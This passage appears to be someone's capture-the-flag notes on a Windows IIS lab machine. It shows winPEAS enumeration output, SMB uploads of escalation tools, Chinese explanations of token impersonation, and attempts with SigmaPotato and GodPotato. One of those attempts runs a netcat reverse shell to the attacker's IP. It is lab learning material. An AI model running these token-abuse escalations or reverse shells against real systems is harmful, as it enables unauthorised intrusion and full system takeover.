224.0.0.0 240.0.0.0 On-link 127.0.0.1 331
224.0.0.0 240.0.0.0 On-link 10.49.169.27 271
255.255.255.255 255.255.255.255 On-link 127.0.0.1 331
255.255.255.255 255.255.255.255 On-link 10.49.169.27 271
===========================================================================
Persistent Routes:
Network Address Netmask Gateway Address Metric
169.254.169.254 255.255.255.255 10.49.128.1 15
169.254.169.250 255.255.255.255 10.49.128.1 15
169.254.169.251 255.255.255.255 10.49.128.1 15
169.254.169.249 255.255.255.255 10.49.128.1 15
169.254.169.123 255.255.255.255 10.49.128.1 15
169.254.169.253 255.255.255.255 10.49.128.1 15
===========================================================================
IPv6 Route Table
===========================================================================
Active Routes:
If Metric Network Destination Gateway
3 331 ::/0 On-link
1 331 ::1/128 On-link
3 331 2001::/32 On-link
3 331 2001:0:14c9:d206:491:278b:f5ce:56e4/128
On-link
7 271 fe80::/64 On-link
3 331 fe80::/64 On-link
3 331 fe80::491:278b:f5ce:56e4/128
On-link
7 271 fe80::41d9:9c64:f059:1c17/128
On-link
1 331 ff00::/8 On-link
7 271 ff00::/8 On-link
3 331 ff00::/8 On-link
===========================================================================
Persistent Routes:
None
=========|| Network Adapter info
----------
Ethernet 3
Amazon Elastic Network Adapter
7
Up
0A-FF-C0-E6-3E-1B
----------
=========|| Checking for WiFi passwords
=========|| Enabled firewall rules - displaying command only - it can overwrite the display buffer
=========|| show all rules with: netsh advfirewall firewall show rule dir=in name=all
=========|| SMB SHARES
Will enumerate SMB Shares and Access if any are available
Everyone has Full to nt4wrksv
=========|| USER INFO
== || Generating List of all Local Administrators, Users and Backup Operators (if any exist)
=========|| USER DIRECTORY ACCESS CHECK
Read Access to C:\Users\Bob
Read Access to C:\Users\Public
=========|| WHOAMI INFO
=========|| Check Token access here: https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/privilege-escalation-abusing-tokens.html#abusing-tokens
=========|| Check if you are inside the Administrators group or if you have enabled any token that can be use to escalate privileges like SeImpersonatePrivilege, SeAssignPrimaryPrivilege, SeTcbPrivilege, SeBackupPrivilege, SeRestorePrivilege, SeCreateTokenPrivilege, SeLoadDriverPrivilege, SeTakeOwnershipPrivilege, SeDebugPrivilege
https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#users--groups
USER INFORMATION
----------------
User Name SID
========================== =============================================================
iis apppool\defaultapppool S-1-5-82-3006700770-424185619-1745488364-794895919-4004696415
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
==================================== ================ ============ ==================================================
Mandatory Label\High Mandatory Level Label S-1-16-12288
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\SERVICE Well-known group S-1-5-6 Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
BUILTIN\IIS_IUSRS Alias S-1-5-32-568 Mandatory group, Enabled by default, Enabled group
LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group
Unknown SID type S-1-5-82-0 Mandatory group, Enabled by default, Enabled group
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token Disabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeAuditPrivilege Generate security audits Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
=========|| Cloud Credentials Check
=========|| APPcmd Check
https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#appcmdexe
C:\Windows\System32\inetsrv\appcmd.exe exists!
=========|| OpenVPN Credentials Check
=========|| PowerShell History (Password Search Only)
=|| PowerShell Console History
=|| To see all history, run this command: Get-Content (Get-PSReadlineOption).HistorySavePath
=|| AppData PSReadline Console History
=|| To see all history, run this command: Get-Content C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
=|| PowerShell default transcript history check
=========|| ENVIRONMENT VARIABLES
Maybe you can take advantage of modifying/creating a binary in some of the following locations
PATH variable entries permissions - place binary or DLL to execute instead of legitimate
https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#dll-hijacking
Hive: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows
Name Property
---- --------
WindowsUpdate
Check if you can modify any binary that is going to be executed by admin or if you can impersonate a not found binary
Split-Path : Cannot bind argument to parameter 'Path' because it is an empty
string.
Computername : RELEVANT
Software : Oracle VM VirtualBox Guest Additions 6.0.14
Version : 6.0.14.0
Publisher : Oracle Corporation
InstallDate :
UninstallString : C:\Program Files\Oracle\VirtualBox Guest Additions\uninst.exe
Architecture : x64
Path : HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\
Uninstall\Oracle VM VirtualBox Guest Additions
Computername : RELEVANT
Software : Amazon SSM Agent
Version : 2.3.978.0
Publisher : Amazon Web Services
InstallDate : 20200725
UninstallString : MsiExec.exe /I{B47EBA04-546C-4E8C-891C-15AEE84241A8}
Architecture : x64
Path : HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\
Uninstall\{B47EBA04-546C-4E8C-891C-15AEE84241A8}
Computername : RELEVANT
Software : Microsoft Visual C++ 2019 X64 Additional Runtime -
14.26.28720
Version : 14.26.28720
Publisher : Microsoft Corporation
InstallDate : 20200725
UninstallString : MsiExec.exe /I{CB4A0FDE-1126-4AE2-97C6-A243692C3D95}
Architecture : x64
Path : HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\
Uninstall\{CB4A0FDE-1126-4AE2-97C6-A243692C3D95}
Computername : RELEVANT
Software : Microsoft Visual C++ 2019 X64 Minimum Runtime - 14.26.28720
Version : 14.26.28720
Publisher : Microsoft Corporation
InstallDate : 20200725
UninstallString : MsiExec.exe /I{DD1EC0FD-3F0A-4740-A05E-1DCD14A6B0D1}
Architecture : x64
Path : HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\
Uninstall\{DD1EC0FD-3F0A-4740-A05E-1DCD14A6B0D1}
Computername : RELEVANT
Software : Microsoft Visual C++ 2015-2019 Redistributable (x64) -
14.26.28720
Version : 14.26.28720.3
Publisher : Microsoft Corporation
InstallDate :
UninstallString : "C:\ProgramData\Package Cache\{7d607fb4-7e28-4c7a-a92f-3fcdaf
555faf}\VC_redist.x64.exe" /uninstall
Architecture : x86
Path : HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\Cur
rentVersion\Uninstall\{7d607fb4-7e28-4c7a-a92f-3fcdaf555faf}
Computername : RELEVANT
Software : Amazon SSM Agent
Version : 2.3.978.0
Publisher : Amazon Web Services
InstallDate :
UninstallString : "C:\ProgramData\Package Cache\{ba82bd60-5b89-4eb9-baca-ce8f96
98931e}\AmazonSSMAgentSetup.exe" /uninstall
Architecture : x86
Path : HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\Cur
rentVersion\Uninstall\{ba82bd60-5b89-4eb9-baca-ce8f9698931e}
# Copyright (c) 1993-2009 Microsoft Corp.
#
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
#
# This file contains the mappings of IP addresses to host names. Each
# entry should be kept on an individual line. The IP address should
# be placed in the first column followed by the corresponding host name.
# The IP address and the host name should be separated by at least one
# space.
#
# Additionally, comments (such as these) may be inserted on individual
# lines or following the machine name denoted by a '#' symbol.
#
# For example:
#
# 102.54.94.97 rhino.acme.com # source server
# 38.25.63.10 x.acme.com # x client host
# localhost name resolution is handled within DNS itself.
# 127.0.0.1 localhost
# ::1 localhost
Group: Access Control Assistance Operators
{GROUP EMPTY}
Group: Administrators
RELEVANT\Administrator
Group: Backup Operators
{GROUP EMPTY}
Group: Certificate Service DCOM Access
{GROUP EMPTY}
Group: Cryptographic Operators
{GROUP EMPTY}
Group: Distributed COM Users
{GROUP EMPTY}
Group: Event Log Readers
{GROUP EMPTY}
Group: Guests
RELEVANT\Guest
Group: Hyper-V Administrators
{GROUP EMPTY}
Group: IIS_IUSRS
{GROUP EMPTY}
Group: Network Configuration Operators
{GROUP EMPTY}
Group: Performance Log Users
{GROUP EMPTY}
Group: Performance Monitor Users
{GROUP EMPTY}
Group: Power Users
{GROUP EMPTY}
Group: Print Operators
{GROUP EMPTY}
Group: RDS Endpoint Servers
{GROUP EMPTY}
Group: RDS Management Servers
{GROUP EMPTY}
Group: RDS Remote Access Servers
{GROUP EMPTY}
Group: Remote Desktop Users
{GROUP EMPTY}
Group: Remote Management Users
{GROUP EMPTY}
Group: Replicator
{GROUP EMPTY}
Group: Storage Replica Administrators
{GROUP EMPTY}
Group: System Managed Accounts Group
RELEVANT\DefaultAccount
Group: Users
NT AUTHORITY\Authenticated Users
NT AUTHORITY\INTERACTIVE
RELEVANT\Bob
Get-Content : Cannot find path 'C:\Windows\system32\config\systemprofile\AppDat
a\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt'
because it does not exist.
At C:\inetpub\wwwroot\nt4wrksv\winPEAS.ps1:1745 char:14
+ ... rite-Host $(Get-Content "$env:USERPROFILE\AppData\Roaming\Microsoft\W ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : ObjectNotFound: (C:\Windows\syst...ost_history.t
xt:String) [Get-Content], ItemNotFoundException
+ FullyQualifiedErrorId : PathNotFound,Microsoft.PowerShell.Commands.GetCo
ntentCommand
Name Value
---- -----
ALLUSERSPROFILE C:\ProgramData
APP_POOL_CONFIG C:\inetpub\temp\apppools\DefaultAppPool\DefaultAppPool.
config
APP_POOL_ID DefaultAppPool
APPDATA C:\Windows\system32\config\systemprofile\AppData\Roamin
g
CommonProgramFiles C:\Program Files\Common Files
CommonProgramFiles(x86) C:\Program Files (x86)\Common Files
CommonProgramW6432 C:\Program Files\Common Files
COMPUTERNAME RELEVANT
ComSpec C:\Windows\system32\cmd.exe
LOCALAPPDATA C:\Windows\system32\config\systemprofile\AppData\Local
NUMBER_OF_PROCESSORS 2
OS Windows_NT
Path C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem
;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows
\system32\config\systemprofile\AppData\Local\Microsoft\
WindowsApps
PATHEXT .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.
CPL
PROCESSOR_ARCHITECTURE AMD64
PROCESSOR_IDENTIFIER AMD64 Family 23 Model 1 Stepping 2, AuthenticAMD
PROCESSOR_LEVEL 23
PROCESSOR_REVISION 0102
ProgramData C:\ProgramData
ProgramFiles C:\Program Files
ProgramFiles(x86) C:\Program Files (x86)
ProgramW6432 C:\Program Files
PROMPT $P$G
PSModulePath WindowsPowerShell\Modules;C:\Program Files\WindowsPower
Shell\Modules;C:\Windows\system32\WindowsPowerShell\v1.
0\Modules
PUBLIC C:\Users\Public
SystemDrive C:
SystemRoot C:\Windows
TEMP C:\Windows\TEMP
TMP C:\Windows\TEMP
USERDOMAIN WORKGROUP
USERNAME RELEVANT$
USERPROFILE C:\Windows\system32\config\systemprofile
windir C:\Windows
=========|| Sticky Notes Check
=========|| Cached Credentials Check
https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#windows-vault
Currently stored credentials:
* NONE *
=========|| UWP PasswordVault / Credential Locker Check
https://hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#uwp-passwordvault--credential-locker
=========|| Checking for DPAPI RPC Master Keys
Use the Mimikatz 'dpapi::masterkey' module with appropriate arguments (/rpc) to decrypt
https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#dpapi
=========|| Checking for DPAPI Cred Master Keys
Use the Mimikatz 'dpapi::cred' module with appropriate /masterkey to decrypt
You can also extract many DPAPI masterkeys from memory with the Mimikatz 'sekurlsa::dpapi' module
https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#dpapi
=========|| Current Logged on Users
No User exists for *
=========|| Remote Sessions
No session exists for *
=========|| Kerberos tickets (does require admin to interact)
Current LogonId is 0:0x307e91
Error calling API LsaCallAuthenticationPackage (ShowTickets substatus): 1312
klist failed with 0xc000005f/-1073741729: A specified logon session does not exist. It may already have been terminated.
=========|| Printing ClipBoard (if any)
=========|| Unattended Files Check
=========|| SAM / SYSTEM Backup Checks
=========|| Group Policy Password Check
=========|| Recycle Bin TIP:
If credentials are found in the recycle bin, tool from nirsoft may assist: http://www.nirsoft.net/password_recovery_tools.html
=========|| Password Check in Files/Folders
=========|| Password Check. Starting at root of each drive. This will take some time. Like, grab a coffee or tea kinda time.
=========|| Looking through each drive, searching for *.xml *.txt *.conf *.config *.cfg *.ini .y*ml *.log *.bak *.xls *.xlsx *.xlsm
C:\inetpub\wwwroot\nt4wrksv\passwords.txt contains the word 'pass'
C:\ProgramData\Amazon\EC2-Windows\Launch\Log\UserdataExecution.log contains the word 'user' -excluding the 'users' directory
C:\Users\All Users\Amazon\EC2-Windows\Launch\Log\Ec2Launch.log contains the word 'user' -excluding the 'users' directory
C:\Users\All Users\Amazon\EC2-Windows\Launch\Log\UserdataExecution.log contains the word 'user' -excluding the 'users' directory
C:\Users\All Users\Amazon\EC2-Windows\Launch\Settings\Ec2LaunchSettings.exe.config contains the word 'user' -excluding the 'users' directory
C:\Users\All Users\Amazon\EC2-Windows\Launch\Sysprep\Unattend.xml contains the word 'user' -excluding the 'users' directory
C:\Users\All Users\Amazon\EC2-Windows\Launch\Readme.txt contains the word 'user' -excluding the 'users' directory
C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\behavior.xml contains the word 'user' -excluding the 'users' directory
C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\behavior.xml contains the word 'user' -excluding the 'users' directory
C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\en-US\resource.xml contains the word 'user' -excluding the 'users' directory
C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\resource.xml contains the word 'user' -excluding the 'users' directory
C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\tasks.xml contains the word 'user' -excluding the 'users' directory
C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\en-US\resource.xml contains the word 'user' -excluding the 'users' directory
C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml contains the word 'user' -excluding the 'users' directory
C:\Users\All Users\Microsoft\Event Viewer\Views\ServerRoles\desktop.ini contains the word 'user' -excluding the 'users' directory
C:\Users\All Users\Microsoft\Event Viewer\Views\ServerRoles\RemoteDesktop.Events.xml contains the word 'user' -excluding the 'users' directory
C:\Users\All Users\Microsoft\Event Viewer\Views\ServerRoles\WebServer.Events.xml contains the word 'user' -excluding the 'users' directory
C:\Users\All Users\Microsoft\ServerManager\Events\FileServer.Events.xml contains the word 'user' -excluding the 'users' directory
C:\Users\All Users\Microsoft\UEV\InboxTemplates\DesktopSettings2013.xml contains the word 'user' -excluding the 'users' directory
C:\Users\All Users\Microsoft\UEV\InboxTemplates\EaseOfAccessSettings2013.xml contains the word 'user' -excluding the 'users' directory
C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftInternetExplorer2013.xml contains the word 'user' -excluding the 'users' directory
C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftInternetExplorer2013Backup.xml contains the word 'user' -excluding the 'users' directory
C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftLync2010.xml contains the word 'user' -excluding the 'users' directory
C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftLync2013Win32.xml contains the word 'user' -excluding the 'users' directory
C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftLync2013Win64.xml contains the word 'user' -excluding the 'users' directory
C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftNotepad.xml contains the word 'user' -excluding the 'users' directory
C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOffice2010Win32.xml contains the word 'user' -excluding the 'users' directory
C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOffice2010Win64.xml contains the word 'user' -excluding the 'users' directory
C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013BackupWin32.xml contains the word 'user' -excluding the 'users' directory
C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013BackupWin64.xml contains the word 'user' -excluding the 'users' directory
C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013Office365Win32.xml contains the word 'user' -excluding the 'users' directory
C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013Office365Win64.xml contains the word 'user' -excluding the 'users' directory
C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013Win32.xml contains the word 'user' -excluding the 'users' directory
C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013Win64.xml contains the word 'user' -excluding the 'users' directory
C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOffice2016BackupWin32.xml contains the word 'user' -excluding the 'users' directory
C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOffice2016BackupWin64.xml contains the word 'user' -excluding the 'users' directory
C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOffice2016Win32.xml contains the word 'user' -excluding the 'users' directory
C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOffice2016Win64.xml contains the word 'user' -excluding the 'users' directory
C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOutlook2013CAWin32.xml contains the word 'user' -excluding the 'users' directory
C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOutlook2013CAWin64.xml contains the word 'user' -excluding the 'users' directory
C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOutlook2016CAWin32.xml contains the word 'user' -excluding the 'users' directory
C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOutlook2016CAWin64.xml contains the word 'user' -excluding the 'users' directory
C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftSkypeForBusiness2016Win32.xml contains the word 'user' -excluding the 'users' directory
C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftSkypeForBusiness2016Win64.xml contains the word 'user' -excluding the 'users' directory
C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftWordpad.xml contains the word 'user' -excluding the 'users' directory
C:\Users\All Users\Microsoft\UEV\InboxTemplates\NetworkPrinters.xml contains the word 'user' -excluding the 'users' directory
C:\Users\All Users\Microsoft\UEV\InboxTemplates\RoamingCredentialSettings.xml contains the word 'user' -excluding the 'users' directory
C:\Users\All Users\Microsoft\UEV\InboxTemplates\ThemeSettings2013.xml contains the word 'user' -excluding the 'users' directory
C:\Users\All Users\Microsoft\UEV\InboxTemplates\VdiState.xml contains the word 'user' -excluding the 'users' directory
C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessibility\Desktop.ini contains the word 'user' -excluding the 'users' directory
C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\desktop.ini contains the word 'user' -excluding the 'users' directory
C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\desktop.ini contains the word 'user' -excluding the 'users' directory
C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Terminal Services\Desktop.ini contains the word 'user' -excluding the 'users' directory
C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini contains the word 'user' -excluding the 'users' directory
C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini contains the word 'user' -excluding the 'users' directory
C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\StartUp\desktop.ini contains the word 'user' -excluding the 'users' directory
C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\System Tools\Desktop.ini contains the word 'user' -excluding the 'users' directory
C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\desktop.ini contains the word 'user' -excluding the 'users' directory
C:\Users\All Users\Microsoft\Windows\Start Menu\desktop.ini contains the word 'user' -excluding the 'users' directory
C:\Users\All Users\Microsoft\Windows\Start Menu Places\desktop.ini contains the word 'user' -excluding the 'users' directory
C:\Users\Bob\Desktop\user.txt contains the word 'user' -excluding the 'users' directory
C:\Windows\debug\PASSWD.LOG contains the word 'pass'
C:\Windows\System32\DriverStore\FileRepository\prnms007.inf_amd64_17f9562d57a6ab29\Amd64\MSPassthrough-pipelineconfig.xml contains the word 'pass'
C:\Windows\WinSxS\amd64_microsoft-windows-appx-alluserstore_31bf3856ad364e35_10.0.14393.0_none_514ad5320ea6c4f2\AppxProvisioning.xml contains the word 'user' -excluding the 'users' directory
C:\Windows\WinSxS\amd64_microsoft-windows-s..i-accessibilityuser_31bf3856ad364e35_10.0.14393.0_none_90b8e57d1f6fa4c2\Desktop.ini contains the word 'user' -excluding the 'users' directory
C:\Windows\WinSxS\amd64_microsoft-windows-s..ini-accessoriesuser_31bf3856ad364e35_10.0.14393.0_none_517899312ad86530\Desktop.ini contains the word 'user' -excluding the 'users' directory
C:\Windows\WinSxS\amd64_microsoft-windows-s..ini-maintenanceuser_31bf3856ad364e35_10.0.14393.0_none_337c0b876c91b947\Desktop.ini contains the word 'user' -excluding the 'users' directory
C:\Windows\WinSxS\amd64_microsoft-windows-s..ini-systemtoolsuser_31bf3856ad364e35_10.0.14393.0_none_4e201939fa3a1c18\Desktop.ini contains the word 'user' -excluding the 'users' directory
C:\Windows\WinSxS\amd64_microsoft-windows-s..l32-kf-userprofiles_31bf3856ad364e35_10.0.14393.0_none_b15a2efe3e4c29d8\desktop.ini contains the word 'user' -excluding the 'users' directory
C:\Windows\WinSxS\amd64_microsoft-windows-s..sktopini-sendtouser_31bf3856ad364e35_10.0.14393.0_none_35b8fcfcaacb635d\Desktop.ini contains the word 'user' -excluding the 'users' directory
The target machine is down, restart a new instance
Target IP Address: 10.48.188.70
We can try to Utilize the Unquoted Service Paths here
1
2
3
4
5
6
7
8
=========|| Checking for Unquoted Service Paths
Fetching the list of services, this may take a while...
Unquoted Service Path found!
Name: AWSLiteAgent
PathName: C:\Program Files\Amazon\XenTools\LiteAgent.exe
StartName: LocalSystem
StartMode: Auto
Running: Stopped
1
2
┌──(root㉿kali)-[/home/kali/Downloads]
└─# cp nc64.exe Program.exe
1
2
smb: \> put Program.exe
putting file Program.exe as \Program.exe (205.6 kB/s) (average 141.3 kB/s)
1
2
3
4
c:\windows\system32\inetsrv>copy C:\inetpub\wwwroot\nt4wrksv\Program.exe C:\
copy C:\inetpub\wwwroot\nt4wrksv\Program.exe C:\
Access is denied.
0 file(s) copied.
基于你目前已经获取了 IIS Web Shell 的进度,建议你将接下来的学习重点转向 Windows 访问令牌(Access Tokens)与服务权限 的底层原理。在 Windows 环境中,Web 应用程序池(AppPool)等服务账户通常会默认携带一些特殊的系统特权。你可以独立研究以下通用安全概念:
SeImpersonatePrivilege 机制: 深入了解“身份模拟”特权在 Windows 操作系统中是如何运作的,它在正常业务逻辑中的合法用途是什么,以及为什么它经常被分配给 IIS 或 SQL Server 等服务账户。
令牌滥用理论: 学习在拥有上述特权的前提下,攻击者在理论上是如何通过滥用 RPC 接口、监听命名管道(Named Pipes)或强制高权限进程进行 NTLM 认证,从而捕获并模拟 NT AUTHORITY\SYSTEM 令牌的。
经典利用模型: 查阅安全社区中关于此类权限滥用的经典理论模型(例如 Print Spoofer 或 Potato 系列的底层工作原理),理解其代码逻辑而非仅仅使用编译好的工具。
建议你在搜索引擎或安全技术博客中检索 “Windows SeImpersonatePrivilege privilege escalation explanation” 或相关的防御加固指南,理解这些核心原理后,你在靶机上的下一步思路自然会变得清晰。
1
2
3
4
5
6
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token Disabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
在 Windows 操作系统中,Access Token(访问令牌)可以被完美地理解为一张高科技电子门禁卡。
当你(或某个后台服务)成功输入密码登录系统时,Windows 的安全部门(LSASS 进程)就会为你当场签发这张门禁卡。此后,你在系统中运行的每一个程序(比如打开 cmd、运行浏览器,或者执行一个脚本),都会“佩戴”这张门禁卡的复印件去办事。
这张“门禁卡”里主要烧录了三项核心信息:
- 你是谁 (User SID): 你的个人唯一数字编号,证明你的绝对身份。
- 你属于哪个部门 (Group SIDs): 记录你所在的群组。比如它会写明你是属于“普通访客组 (Users)”还是“超级管理员组 (Administrators)”。
- 你有哪些特权 (Privileges): 记录系统赋予你的特殊操作权限。比如你是否有权“更改系统时间”、“强制重启电脑”,或者你之前在输出里看到的
SeImpersonatePrivilege(模拟客户端后身份验证)。
门禁卡是如何工作的?(Token 与 ACL 的交互)
系统里所有的资源(文件、注册表、运行的程序)都上了一把锁,这把锁叫 ACL(访问控制列表)。ACL 就像贴在门上的一张白名单,上面写着“仅限 IT 部进入”或“允许所有人读取,但仅限老板修改”。
当你的程序试图打开一个文件时,Windows 的内核保安(安全引用监视器 SRM)就会拦住它:
- 提取程序佩戴的“门禁卡”(Access Token)。
- 查看文件门上的“白名单”(ACL)。
- 对比两者。如果你的门禁卡级别够,就放行;如果不够,直接弹回
Access Denied。
两种门禁卡:主令牌与模拟令牌
这是理解提权漏洞最关键的一环。Windows 设计了两种令牌:
- 主令牌 (Primary Token): 这是你本人的默认门禁卡。当你双击运行一个程序时,这个程序用的就是你的主令牌。
- 模拟令牌 (Impersonation Token): 这是 Windows 为了方便服务程序干活而发明的一种“借用机制”。假设你是一个前台接待员(比如靶机里的 IIS Web 服务程序),一个拥有顶级权限的 VIP(比如 SYSTEM 账号)让你帮忙去拿个外卖。为了让你能顺利通过高级安检通道,VIP 把他的顶级门禁卡临时借给你刷一下。
当你拿着 VIP 的门禁卡去办事时,你的程序所使用的就是“模拟令牌”。
在网络安全中,如果一个低权限的服务账号(如 IIS 进程)被赋予了可以合法“借用”他人门禁卡的特权(即 SeImpersonatePrivilege 处于 Enabled 状态),攻击者就可以通过各种技术手段(如强制高权限服务向自己发起请求),把 SYSTEM 的顶级门禁卡骗过来握在自己手里,从而瞬间完成从普通员工到系统上帝的权限跃迁。
https://hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/privilege-escalation-abusing-tokens.html#seimpersonateprivilege
https://github.com/tylerdotrar/SigmaPotato
Upload the SigmaPotato.exe
Restart the target instance since it’s donw
Target IP Address: 10.48.135.147
1
2
smb: \> put SigmaPotato.exe
putting file SigmaPotato.exe as \SigmaPotato.exe (302.4 kB/s) (average 206.8 kB/s)
SigmaPotato.exe failed
1
2
3
4
5
6
c:\windows\system32\inetsrv>C:\inetpub\wwwroot\nt4wrksv\SigmaPotato.exe --revshell 192.168.162.207 4444
C:\inetpub\wwwroot\nt4wrksv\SigmaPotato.exe --revshell 192.168.162.207 4444
[+] Starting Pipe Server...
[+] Created Pipe Name: \\.\pipe\SigmaPotato\pipe\epmapper
[-] Failed to impersonate security context token.
[-] ConnectNamedPipe timeout.
https://github.com/ohpe/juicy-potato/releases
1
2
smb: \> put JuicyPotato.exe
putting file JuicyPotato.exe as \JuicyPotato.exe (930.1 kB/s) (average 506.8 kB/s)
https://github.com/BeichenDream/GodPotato
1
2
3
4
5
6
smb: \> put GodPotato-NET2.exe
putting file GodPotato-NET2.exe as \GodPotato-NET2.exe (284.3 kB/s) (average 466.1 kB/s)
smb: \> put GodPotato-NET35.exe
putting file GodPotato-NET35.exe as \GodPotato-NET35.exe (280.0 kB/s) (average 437.0 kB/s)
smb: \> put GodPotato-NET4.exe
putting file GodPotato-NET4.exe as \GodPotato-NET4.exe (284.3 kB/s) (average 416.6 kB/s)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
c:\windows\system32\inetsrv>C:\inetpub\wwwroot\nt4wrksv\GodPotato-NET2.exe -cmd "nc64.exe -t -e C:\Windows\System32\cmd.exe 192.168.162.207 4444"
C:\inetpub\wwwroot\nt4wrksv\GodPotato-NET2.exe -cmd "nc64.exe -t -e C:\Windows\System32\cmd.exe 192.168.162.207 4444"
c:\windows\system32\inetsrv>C:\inetpub\wwwroot\nt4wrksv\GodPotato-NET35.exe -cmd "nc64.exe -t -e C:\Windows\System32\cmd.exe 192.168.162.207 4444"
C:\inetpub\wwwroot\nt4wrksv\GodPotato-NET35.exe -cmd "nc64.exe -t -e C:\Windows\System32\cmd.exe 192.168.162.207 4444"
c:\windows\system32\inetsrv>C:\inetpub\wwwroot\nt4wrksv\GodPotato-NET4.exe -cmd "nc64.exe -t -e C:\Windows\System32\cmd.exe 192.168.162.207 4444"
C:\inetpub\wwwroot\nt4wrksv\GodPotato-NET4.exe -cmd "nc64.exe -t -e C:\Windows\System32\cmd.exe 192.168.162.207 4444"
[*] CombaseModule: 0x140707640770560
